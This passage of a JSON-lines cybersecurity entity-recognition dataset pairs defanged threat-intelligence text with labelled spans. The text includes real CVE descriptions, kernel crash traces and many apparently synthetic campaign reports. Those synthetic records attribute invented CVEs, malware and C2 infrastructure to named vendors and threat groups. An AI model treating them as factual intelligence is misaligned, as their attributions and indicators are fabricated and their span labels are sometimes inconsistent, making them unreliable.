__lookup_slow+0x188/0x350\n walk_component+0x2ab/0x4f0\n path_lookupat+0x120/0x660\n filename_lookup+0x1ce/0x560\n vfs_statx+0xac/0x150\n __do_sys_newstat+0x96/0x110\n do_syscall_64+0x5f/0x170\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n[adobriyan@gmail[.]com: don't do 2 atomic ops on the common path]", "spans": {"Indicator: gmail.com": [[2364, 2375]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1299, 1303]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-21999"}}
{"text": "We were able to discover this particular version by diving further into connections to analytics-google[ . ]org .", "spans": {"Indicator: analytics-google.org": [[87, 111]]}, "info": {"id": "cyberner_stix_train_001191", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls. For example, the `While` implementation(hxxps://github[ . ]com/tensorflow/tensorflow/blob/106d8f4fb89335a2c52d7c895b7a7485465ca8d9/tensorflow/lite/kernels/while.cc) could be tricked into a scneario where both the body and the loop subgraphs are the same. Evaluating one of the subgraphs means calling the `Eval` function for the other and this quickly exhaust all stack space. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. Please consult our security guide(hxxps://github[.]com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/106d8f4fb89335a2c52d7c895b7a7485465ca8d9/tensorflow/lite/kernels/while.cc": [[394, 517]], "Indicator: https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md": [[982, 1048]], "Vulnerability: stack overflow": [[306, 320]], "Vulnerability: infinite loop": [[216, 229], [271, 284]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29591"}}
{"text": "Vulnerability Advisory: CVE-2023-46500 is a critical heap overflow affecting MOVEit Transfer. CrowdStrike confirmed active exploitation by APT28 in the wild. Exploitation delivers SmokeLoader (SHA1: ec853b9035b322739988c30bd4363004c1267dfd) which is dropped to /var/tmp/dropper.ps1. The exploit payload is hosted at hxxps://relayauth[.]dev/login and communicates to 10[.]25[.]228[.]151 for C2.", "spans": {"Vulnerability: CVE-2023-46500": [[24, 38]], "Vulnerability: heap overflow": [[53, 66]], "System: MOVEit Transfer": [[77, 92]], "Organization: CrowdStrike": [[94, 105]], "Malware: SmokeLoader": [[180, 191]], "Indicator: ec853b9035b322739988c30bd4363004c1267dfd": [[199, 239]], "Indicator: https://relayauth.dev/login": [[316, 345]], "Indicator: 10.25.228.151": [[366, 385]]}, "info": {"id": "synth_v2_00732", "source": "defanged_augment"}}
{"text": "To their credit , both Google and Amazon appear to have put pressure on device manufacturers to fix their devices when flaws are found , Strazzere says . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . C2 : krjregh[ . ]sacreeflame[ . ]com .", "spans": {"Organization: Google": [[23, 29]], "Organization: Amazon": [[34, 40]], "Vulnerability: CVE-2017-11882": [[182, 196]], "Vulnerability: CVE-2018-0802": [[201, 214]], "Indicator: krjregh.sacreeflame.com": [[441, 472]]}, "info": {"id": "cyberner_stix_train_007947", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Conti Campaign:\nNetwork Indicators:\n- 177 [ . ] 99 [ . ] 210 [ . ] 105\n- 71[.]228[.]187[.]131\n- 215 [ . ] 124 [ . ] 247 [ . ] 233\n- cdn-storage[.]xyz\n- mail-cache[.]com\nURLs:\n- hxxps://relayauth[ . ]io/wp-content/uploads/doc.php\n- hxxps://updateauth[ . ]online/wp-content/uploads/doc.php\nEmail Senders:\n- admin@mail-service[.]info\n- support@account-update[ . ]xyz\nFile Indicators:\n- MD5: 976f74083a5780dcf563e00751c44406\n- SHA1: 992a1bc84be507c4dfe69046188f1880b8214bca\n- Drop path: /etc/cron.d/lsass.dmp", "spans": {"Malware: Conti": [[15, 20]], "Indicator: 177.99.210.105": [[53, 85]], "Indicator: 71.228.187.131": [[88, 108]], "Indicator: 215.124.247.233": [[111, 144]], "Indicator: cdn-storage.xyz": [[147, 164]], "Indicator: mail-cache.com": [[167, 183]], "Indicator: https://relayauth.io/wp-content/uploads/doc.php": [[192, 243]], "Indicator: https://updateauth.online/wp-content/uploads/doc.php": [[246, 302]], "Indicator: admin@mail-service.info": [[320, 345]], "Indicator: support@account-update.xyz": [[348, 378]], "Indicator: 976f74083a5780dcf563e00751c44406": [[403, 435]], "Indicator: 992a1bc84be507c4dfe69046188f1880b8214bca": [[444, 484]]}, "info": {"id": "synth_v2_01497", "source": "defanged_augment"}}
{"text": "Qualys detected a multi-stage attack chain. The initial phishing email from updates@urgent-notice[.]online contained a link to hxxp://mailrelay[.]io/wp-content/uploads/doc.php. This redirected to hxxps://static-cache[.]link/wp-content/uploads/doc.php on cache-storage[.]online. A secondary email from billing@phishing-domain[.]com pointed to hxxps://update-cache[.]top/api/v2/auth which delivered Lumma Stealer. The final payload callback was hxxp://relayedge[ . ]online/panel/index.html resolving to 192[.]221[.]185[.]162 via node-data[ . ]cc.", "spans": {"Organization: Qualys": [[0, 6]], "Indicator: updates@urgent-notice.online": [[76, 106]], "Indicator: hxxp://mailrelay.io/wp-content/uploads/doc.php": [[127, 175]], "Indicator: https://static-cache.link/wp-content/uploads/doc.php": [[196, 250]], "Indicator: cache-storage.online": [[254, 276]], "Indicator: billing@phishing-domain.com": [[301, 330]], "Indicator: https://update-cache.top/api/v2/auth": [[342, 380]], "Malware: Lumma Stealer": [[397, 410]], "Indicator: hxxp://relayedge.online/panel/index.html": [[443, 487]], "Indicator: 192.221.185.162": [[501, 522]], "Indicator: node-data.cc": [[527, 543]]}, "info": {"id": "synth_v2_01748", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.HfsAdware.6632 PUP.Optional.Nosibay TROJ_GE.FF4D51A5 Adware.Downware.11318 virus[.]win32[.]sality[.]at PUA/BubbleDock.A PUP.Nosibay/Variant NSIS.Application.SilentInstaller.A Win32.Trojan.Bubbledock.Huzb", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: virus.win32.sality.at": [[105, 132]]}, "info": {"id": "cyner2_train_002595", "source": "defanged_augment"}}
{"text": "Blog Post by CISA: Tracking Storm-0558's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-36175 against Barracuda ESG deployments. The initial access vector involves spear-phishing emails from verify@urgent-notice[.]online delivering REvil. Post-compromise, the attackers deploy BlackCat and use PsExec for reconnaissance. C2 infrastructure includes 10 [ . ] 89 [ . ] 240 [ . ] 88 and sync-auth[.]io. A staging server at hxxps://static-static[ . ]club/secure/token hosts additional tooling. Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\config.dat (SHA1: 84cead1be1bb20babc7bd427d844ff0481f8dab2).", "spans": {"Organization: CISA": [[13, 17]], "Vulnerability: CVE-2025-36175": [[118, 132]], "System: Barracuda ESG": [[141, 154]], "Indicator: verify@urgent-notice.online": [[230, 259]], "Malware: REvil": [[271, 276]], "Malware: BlackCat": [[316, 324]], "Indicator: 10.89.240.88": [[387, 417]], "Indicator: sync-auth.io": [[422, 436]], "Indicator: https://static-static.club/secure/token": [[458, 501]], "Indicator: 84cead1be1bb20babc7bd427d844ff0481f8dab2": [[594, 634]]}, "info": {"id": "synth_v2_01513", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-el7-0[.]9[.]8[.]891. Authentication is not required to exploit this vulnerability. The specific flaw exists within loader_ajax.php. When parsing the line parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9259.", "spans": {"Indicator: 0.9.8.891": [[123, 138]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15420"}}
{"text": "The Sogu gang use a custom developed threat – Backdoor[.]Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy .", "spans": {"Organization: Sogu": [[4, 8]], "Indicator: Backdoor.Sogu": [[46, 61]], "Malware: Poison Ivy": [[139, 149]]}, "info": {"id": "cyberner_stix_train_005370", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from report@auth-check[.]org and it@document-share[.]link, spoofing legitimate services. Victims were directed to hxxp://secure-proxy[.]top/callback which hosted a credential harvesting page on edge-storage[ . ]com. A secondary link hxxps://apibackup[.]cc/login delivered DarkSide (MD5: d64ed40267123be39effbb6c2df5785e). The malware was saved to /opt/app/bin/chrome_helper.exe and established C2 with 172 [ . ] 147 [ . ] 130 [ . ] 225.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: report@auth-check.org": [[103, 126]], "Indicator: it@document-share.link": [[131, 155]], "Indicator: http://secure-proxy.top/callback": [[212, 246]], "Indicator: edge-storage.com": [[292, 312]], "Indicator: hxxps://apibackup.cc/login": [[331, 359]], "Malware: DarkSide": [[370, 378]], "Indicator: d64ed40267123be39effbb6c2df5785e": [[385, 417]], "Indicator: 172.147.130.225": [[500, 533]]}, "info": {"id": "synth_v2_01034", "source": "defanged_augment"}}
{"text": "Shamoon2 : 5 [ . ] 254 [ . ] 100 [ . ] 200 Shamoon2 : URLs .", "spans": {"Malware: Shamoon2": [[0, 8], [43, 51]], "Indicator: 5.254.100.200": [[11, 42]]}, "info": {"id": "cyberner_stix_train_006624", "source": "defanged_augment"}}
{"text": "Analysis of FormBook sample (SHA256: 4e0863e4cc68d9634d0af31a52e2d7933912795b397385adb96d06e507ded32e) revealed command-and-control communication with 82[.]70[.]73[.]155 over port 9090. A secondary C2 channel was observed connecting to exfil-data[[ . ]]club which resolved to 104 [ . ] 184 [ . ] 88 [ . ] 53. The malware binary was written to C:\\ProgramData\\svchost.exe and established persistence via a scheduled task.", "spans": {"Malware: FormBook": [[12, 20]], "Indicator: 4e0863e4cc68d9634d0af31a52e2d7933912795b397385adb96d06e507ded32e": [[37, 101]], "Indicator: 82.70.73.155": [[151, 169]], "Indicator: exfil-data[.]club": [[236, 257]], "Indicator: 104.184.88.53": [[276, 307]]}, "info": {"id": "synth_00046", "source": "defanged_augment"}}
{"text": "* Dec 29 - [[NTT] Report on APT Attacks by BlackTech](hxxps://jp[ . ]security[ . ]ntt/resources/EN-BlackTech_2021.pdf) | :closed_book:\n* Dec 16 - [[Zscaler] New DarkHotel APT attack chain identified](hxxps://www[.]zscaler[.]com/blogs/security-research/new-darkhotel-apt-attack-chain-identified) | :closed_book:\n* Dec 11 - [[ESET] Jumping the air gap: 15 years of nation-state effort](hxxps://www[.]welivesecurity[.]com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf) | :closed_book:\n* Dec 07 - [[Mandiant] FIN13: A Cybercriminal Threat Actor Focused on Mexico](hxxps://www[ . ]mandiant[ . ]com/resources/fin13-cybercriminal-mexico) | :closed_book:\n* Dec 03 - [[Pwc] Conti cyber attack on the HSE](hxxps://www[ . ]hse[ . ]ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf) | :closed_book:\n* Nov 29 - [[Trend Micro] Campaign Abusing Legitimate Remote Administrator Tools Uses Fake Cryptocurrency Websites](hxxps://www[ . ]trendmicro[ . ]com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html) | :closed_book: \n* Nov 16 - [[Mandiant] UNC1151 Assessed with High Confidence to have Links to Belarus, Ghostwriter Campaign Aligned with Belarusian Government Interests](hxxps://www[.]mandiant[.]com/resources/unc1151-linked-to-belarus-government) | :closed_book:\n* Nov 16 - [[ESET] Strategic web compromises in the Middle East with a pinch of Candiru](hxxps://www[ . ]welivesecurity[ . ]com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/) | :closed_book:\n* Nov 11 - [[Google] Analyzing a watering hole campaign using macOS exploits](hxxps://blog[.]google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/) | :closed_book:\n* Nov 10 - [[Trend Micro] Void Balaur: Tracking a Cybermercenary’s Activities](hxxps://documents[.]trendmicro[.]com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf) | :closed_book:\n* Nov 08 - [[NCCGroup] TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access](hxxps://research[ . ]nccgroup[ . ]com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/) | :closed_book:\n* Nov 04 - [[SSU] Gamaredon Armageddon Group](hxxps://ssu[ . ]gov[ . ]ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf) | :closed_book:\n* Oct 19 - [[CrowdStrike] LightBasin: A Roaming Threat to Telecommunications Companies](hxxps://www[ . ]crowdstrik", "spans": {"Vulnerability: CVE-2021-35211": [[1991, 2005]], "Indicator: https://jp.security.ntt/resources/EN-BlackTech_2021.pdf": [[54, 117]], "Indicator: https://www.zscaler.com/blogs/security-research/new-darkhotel-apt-attack-chain-identified": [[200, 293]], "Indicator: https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf": [[384, 477]], "Indicator: https://www.mandiant.com/resources/fin13-cybercriminal-mexico": [[573, 642]], "Indicator: https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf": [[709, 807]], "Indicator: https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html": [[941, 1041]], "Indicator: https://www.mandiant.com/resources/unc1151-linked-to-belarus-government": [[1214, 1289]], "Indicator: https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/": [[1396, 1498]], "Indicator: https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/": [[1594, 1692]], "Indicator: https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf": [[1789, 1902]], "Indicator: https://research.nccgroup.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/": [[2027, 2157]], "Indicator: https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf": [[2221, 2301]], "Indicator: https://www.crowdstrik": [[2407, 2433]], "System: macOS": [[1578, 1583]], "System: SolarWinds": [[1958, 1968]], "Organization: Mandiant": [[508, 516], [1073, 1081]], "Organization: Zscaler": [[148, 155]], "Organization: CrowdStrike": [[2332, 2343]], "Organization: Google": [[1529, 1535]], "Vulnerability: watering hole": [[1549, 1562]], "Malware: Conti": [[678, 683]], "Malware: Report": [[18, 24]], "Organization: Trend Micro": [[838, 849], [1723, 1734]], "Organization: ESET": [[324, 328], [1320, 1324]]}, "info": {"source": "defanged_augment", "name": "2021"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: DPLL, Fix possible use after free after delayed work timer triggers\n\nI managed to hit following use after free warning recently:\n\n[ 2169.711665] ==================================================================\n[ 2169.714009] BUG: KASAN: slab-use-after-free in __run_timers.part.0+0x179/0x4c0\n[ 2169.716293] Write of size 8 at addr ffff88812b326a70 by task swapper/4/0\n\n[ 2169.719022] CPU: 4 PID: 0 Comm: swapper/4 Not tainted 6.8.0-rc2jiri+ #2\n[ 2169.720974] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]13[.]0-0-gf21b5a4aeb02-prebuilt[.]qemu[.]org 04/01/2014\n[ 2169.722457] Call Trace:\n[ 2169.722756]  <IRQ>\n[ 2169.723024]  dump_stack_lvl+0x58/0xb0\n[ 2169.723417]  print_report+0xc5/0x630\n[ 2169.723807]  ? __virt_addr_valid+0x126/0x2b0\n[ 2169.724268]  kasan_report+0xbe/0xf0\n[ 2169.724667]  ? __run_timers.part.0+0x179/0x4c0\n[ 2169.725116]  ? __run_timers.part.0+0x179/0x4c0\n[ 2169.725570]  __run_timers.part.0+0x179/0x4c0\n[ 2169.726003]  ? call_timer_fn+0x320/0x320\n[ 2169.726404]  ? lock_downgrade+0x3a0/0x3a0\n[ 2169.726820]  ? kvm_clock_get_cycles+0x14/0x20\n[ 2169.727257]  ? ktime_get+0x92/0x150\n[ 2169.727630]  ? lapic_next_deadline+0x35/0x60\n[ 2169.728069]  run_timer_softirq+0x40/0x80\n[ 2169.728475]  __do_softirq+0x1a1/0x509\n[ 2169.728866]  irq_exit_rcu+0x95/0xc0\n[ 2169.729241]  sysvec_apic_timer_interrupt+0x6b/0x80\n[ 2169.729718]  </IRQ>\n[ 2169.729993]  <TASK>\n[ 2169.730259]  asm_sysvec_apic_timer_interrupt+0x16/0x20\n[ 2169.730755] RIP: 0010:default_idle+0x13/0x20\n[ 2169.731190] Code: c0 08 00 00 00 4d 29 c8 4c 01 c7 4c 29 c2 e9 72 ff ff ff cc cc cc cc 8b 05 9a 7f 1f 02 85 c0 7e 07 0f 00 2d cf 69 43 00 fb f4 <fa> c3 66 66 2e 0f 1f 84 00 00 00 00 00 65 48 8b 04 25 c0 93 04 00\n[ 2169.732759] RSP: 0018:ffff888100dbfe10 EFLAGS: 00000242\n[ 2169.733264] RAX: 0000000000000001 RBX: ffff888100d9c200 RCX: ffffffff8241bd62\n[ 2169.733925] RDX: ffffed109a848b15 RSI: 0000000000000004 RDI: ffffffff8127ac55\n[ 2169.734566] RBP: 0000000000000004 R08: 0000000000000000 R09: ffffed109a848b14\n[ 2169.735200] R10: ffff8884d42458a3 R11: 000000000000ba7e R12: ffffffff83d7d3a0\n[ 2169.735835] R13: 1ffff110201b7fc6 R14: 0000000000000000 R15: ffff888100d9c200\n[ 2169.736478]  ? ct_kernel_exit.constprop.0+0xa2/0xc0\n[ 2169.736954]  ? do_idle+0x285/0x290\n[ 2169.737323]  default_idle_call+0x63/0x90\n[ 2169.737730]  do_idle+0x285/0x290\n[ 2169.738089]  ? arch_cpu_idle_exit+0x30/0x30\n[ 2169.738511]  ? mark_held_locks+0x1a/0x80\n[ 2169.738917]  ? lockdep_hardirqs_on_prepare+0x12e/0x200\n[ 2169.739417]  cpu_startup_entry+0x30/0x40\n[ 2169.739825]  start_secondary+0x19a/0x1c0\n[ 2169.740229]  ? set_cpu_sibling_map+0xbd0/0xbd0\n[ 2169.740673]  secondary_startup_64_no_verify+0x15d/0x16b\n[ 2169.741179]  </TASK>\n\n[ 2169.741686] Allocated by task 1098:\n[ 2169.742058]  kasan_save_stack+0x1c/0x40\n[ 2169.742456]  kasan_save_track+0x10/0x30\n[ 2169.742852]  __kasan_kmalloc+0x83/0x90\n[ 2169.743246]  mlx5_dpll_probe+0xf5/0x3c0 [mlx5_dpll]\n[ 2169.743730]  auxiliary_bus_probe+0x62/0xb0\n[ 2169.744148]  really_probe+0x127/0x590\n[ 2169.744534]  __driver_probe_device+0xd2/0x200\n[ 2169.744973]  device_driver_attach+0x6b/0xf0\n[ 2169.745402]  bind_store+0x90/0xe0\n[ 2169.745761]  kernfs_fop_write_iter+0x1df/0x2a0\n[ 2169.746210]  vfs_write+0x41f/0x790\n[ 2169.746579]  ksys_write+0xc7/0x160\n[ 2169.746947]  do_syscall_64+0x6f/0x140\n[ 2169.747333]  entry_SYSCALL_64_after_hwframe+0x46/0x4e\n\n[ 2169.748049] Freed by task 1220:\n[ 2169.748393]  kasan_save_stack+0x1c/0x40\n[ 2169.748789]  kasan_save_track+0x10/0x30\n[ 2169.749188]  kasan_save_free_info+0x3b/0x50\n[ 2169.749621]  poison_slab_object+0x106/0x180\n[ 2169.750044]  __kasan_slab_free+0x14/0x50\n[ 2169.750451]  kfree+0x118/0x330\n[ 2169.750792]  mlx5_dpll_remove+0xf5/0x110 [mlx5_dpll]\n[ 2169.751271]  auxiliary_bus_remove+0x2e/0x40\n[ 2169.751694]  device_release_driver_internal+0x24b/0x2e0\n[ 2169.752191]  unbind_store+0xa6/0xb0\n[ 2169.752563]  kernfs_fo\n---truncated---", "spans": {"Indicator: rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org": [[597, 649]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[555, 559]], "Vulnerability: use after free": [[98, 112], [175, 189]], "Vulnerability: use-after-free": [[323, 337]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-26724"}}
{"text": "On BIG-IP versions 16.0.x before 16[.]0[.]1[.]1, 15.1.x before 15[.]1[.]2[.]1, 14.1.x before 14.1.4, 13.1.x before 13 [ . ] 1 [ . ] 3 [ . ] 6, 12.1.x before 12[.]1[.]5[.]3, and 11.6.x before 11[.]6[.]5[.]3, a malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it may allow remote code execution (RCE), leading to complete system compromise. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "spans": {"Indicator: 16.0.1.1": [[33, 47]], "Indicator: 15.1.2.1": [[63, 77]], "Indicator: 13.1.3.6": [[115, 141]], "Indicator: 12.1.5.3": [[157, 171]], "Indicator: 11.6.5.3": [[191, 205]], "Vulnerability: remote code execution": [[413, 434]], "Vulnerability: buffer overflow": [[333, 348]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-22992"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed PowerView artifacts at C:\\Windows\\Temp\\runtime.dll. Memory dump analysis confirmed execution of Nmap. Registry modifications pointed to persistence via C:\\ProgramData\\lsass.dmp. Network forensics identified connections to 163 [ . ] 32 [ . ] 73 [ . ] 120 and datamail[.]top. Email headers traced the initial vector to info@identity-verify[.]cc. File C:\\Users\\admin\\Desktop\\agent.py (MD5: 27530415a91fef25ca115872d73b182a) was identified as the initial dropper. A staging URL hxxps://api-cache[ . ]cc/collect resolved to 10[.]89[.]134[.]35. Secondary artifact hash: SHA1: f4f16c10535c0619990979d9b5e7c29410a44d3f.", "spans": {"Indicator: 163.32.73.120": [[294, 325]], "Indicator: datamail.top": [[330, 344]], "Indicator: info@identity-verify.cc": [[389, 414]], "Indicator: 27530415a91fef25ca115872d73b182a": [[459, 491]], "Indicator: hxxps://api-cache.cc/collect": [[546, 578]], "Indicator: 10.89.134.35": [[591, 609]], "Indicator: f4f16c10535c0619990979d9b5e7c29410a44d3f": [[642, 682]]}, "info": {"id": "synth_v2_01272", "source": "defanged_augment"}}
{"text": "] netsybil-parks [ . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran . For example , “ hugesoft[ . ]org ” is an FQDN but also represents a zone . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"Organization: civil society": [[162, 175]], "Indicator: hugesoft.org": [[289, 305]]}, "info": {"id": "cyberner_stix_train_005658", "source": "defanged_augment"}}
{"text": "INTERPOL detected a multi-stage attack chain. The initial phishing email from verify@phishing-domain[.]com contained a link to hxxps://backupnode[.]link/callback. This redirected to hxxp://secure-sync[ . ]info/panel/index.html on loginrelay[ . ]cc. A secondary email from noreply@secure-verify[.]net pointed to hxxps://gatewaycdn[.]info/assets/js/payload.js which delivered Raccoon Stealer. The final payload callback was hxxps://gateway-auth[ . ]site/secure/token resolving to 172 [ . ] 195 [ . ] 39 [ . ] 190 via cloud-cache[.]cc.", "spans": {"Organization: INTERPOL": [[0, 8]], "Indicator: verify@phishing-domain.com": [[78, 106]], "Indicator: hxxps://backupnode.link/callback": [[127, 161]], "Indicator: http://secure-sync.info/panel/index.html": [[182, 226]], "Indicator: loginrelay.cc": [[230, 247]], "Indicator: noreply@secure-verify.net": [[272, 299]], "Indicator: hxxps://gatewaycdn.info/assets/js/payload.js": [[311, 357]], "Malware: Raccoon Stealer": [[374, 389]], "Indicator: https://gateway-auth.site/secure/token": [[422, 464]], "Indicator: 172.195.39.190": [[478, 510]], "Indicator: cloud-cache.cc": [[515, 531]]}, "info": {"id": "synth_v2_01841", "source": "defanged_augment"}}
{"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions . Winnti : C&C : w[org_name][ . ]dnslookup[ . ]services : 443 . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"Malware: Svpeng": [[0, 6]], "Organization: government institutions": [[253, 276]], "Indicator: w[org_name].dnslookup.services": [[294, 332]]}, "info": {"id": "cyberner_stix_train_007823", "source": "defanged_augment"}}
{"text": "Blog Post by Tenable: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-22601 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from it@document-share[.]link delivering Lumma Stealer. Post-compromise, the attackers deploy TrickBot and use CrackMapExec for reconnaissance. C2 infrastructure includes 60[.]91[.]221[.]147 and sync-static[.]info. A staging server at hxxp://edge-update[ . ]net/admin/config hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\taskhost.exe (SHA1: 5b858d4f94709a3ad09b168e422d9e927c1639e3).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2022-22601": [[124, 138]], "System: F5 BIG-IP": [[147, 156]], "Indicator: it@document-share.link": [[232, 256]], "Malware: Lumma Stealer": [[268, 281]], "Malware: TrickBot": [[321, 329]], "Indicator: 60.91.221.147": [[398, 417]], "Indicator: sync-static.info": [[422, 440]], "Indicator: http://edge-update.net/admin/config": [[462, 501]], "Indicator: 5b858d4f94709a3ad09b168e422d9e927c1639e3": [[588, 628]]}, "info": {"id": "synth_v2_01624", "source": "defanged_augment"}}
{"text": "Blog Post by Huntress: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-32541 against Apache Struts deployments. The initial access vector involves spear-phishing emails from it@mail-service[ . ]info delivering PlugX. Post-compromise, the attackers deploy StealC and use CrackMapExec for reconnaissance. C2 infrastructure includes 192[.]233[.]226[.]3 and auth-cdn[.]io. A staging server at hxxps://node-cloud[.]info/collect hosts additional tooling. Key artifact: /usr/local/bin/loader.exe (SHA1: bbe8da709c7e8f7d9645102700c38c71222dc623).", "spans": {"Organization: Huntress": [[13, 21]], "Vulnerability: CVE-2022-32541": [[125, 139]], "System: Apache Struts": [[148, 161]], "Indicator: it@mail-service.info": [[237, 261]], "Malware: PlugX": [[273, 278]], "Malware: StealC": [[318, 324]], "Indicator: 192.233.226.3": [[393, 412]], "Indicator: auth-cdn.io": [[417, 430]], "Indicator: hxxps://node-cloud.info/collect": [[452, 485]], "Indicator: bbe8da709c7e8f7d9645102700c38c71222dc623": [[559, 599]]}, "info": {"id": "synth_v2_01660", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: SentinelOne identified a large-scale phishing operation. Emails originated from noreply@credential-check[ . ]site and alert@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://relay-mail[ . ]top/callback which hosted a credential harvesting page on securestatic[.]dev. A secondary link hxxp://proxy-auth[ . ]site/login delivered WarmCookie (SHA256: c0e98b7c0352c6a6c057be2b9d7c2af013aa2503137d362de85a36975a49f8ad). The malware was saved to /home/user/.config/backdoor.elf and established C2 with 148 [ . ] 119 [ . ] 16 [ . ] 96.", "spans": {"Organization: SentinelOne": [[26, 37]], "Indicator: noreply@credential-check.site": [[106, 139]], "Indicator: alert@secure-verify.net": [[144, 171]], "Indicator: http://relay-mail.top/callback": [[228, 262]], "Indicator: securestatic.dev": [[308, 326]], "Indicator: hxxp://proxy-auth.site/login": [[345, 377]], "Malware: WarmCookie": [[388, 398]], "Indicator: c0e98b7c0352c6a6c057be2b9d7c2af013aa2503137d362de85a36975a49f8ad": [[408, 472]], "Indicator: 148.119.16.96": [[556, 587]]}, "info": {"id": "synth_v2_00940", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Check Point Research identified a large-scale phishing operation. Emails originated from alert@login-portal[ . ]tech and it@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxps://data-mail[ . ]top/secure/token which hosted a credential harvesting page on update-gateway[.]info. A secondary link hxxp://storage-relay[ . ]dev/download/update.exe delivered Conti (SHA1: aee34fba81237601b8e27c58f209937a4c5f013e). The malware was saved to /etc/cron.d/beacon.dll and established C2 with 192[.]237[.]123[.]8.", "spans": {"Organization: Check Point Research": [[26, 46]], "Indicator: alert@login-portal.tech": [[115, 142]], "Indicator: it@secure-verify.net": [[147, 171]], "Indicator: hxxps://data-mail.top/secure/token": [[228, 266]], "Indicator: update-gateway.info": [[312, 333]], "Indicator: hxxp://storage-relay.dev/download/update.exe": [[352, 400]], "Malware: Conti": [[411, 416]], "Indicator: aee34fba81237601b8e27c58f209937a4c5f013e": [[424, 464]], "Indicator: 192.237.123.8": [[539, 558]]}, "info": {"id": "synth_v2_01060", "source": "defanged_augment"}}
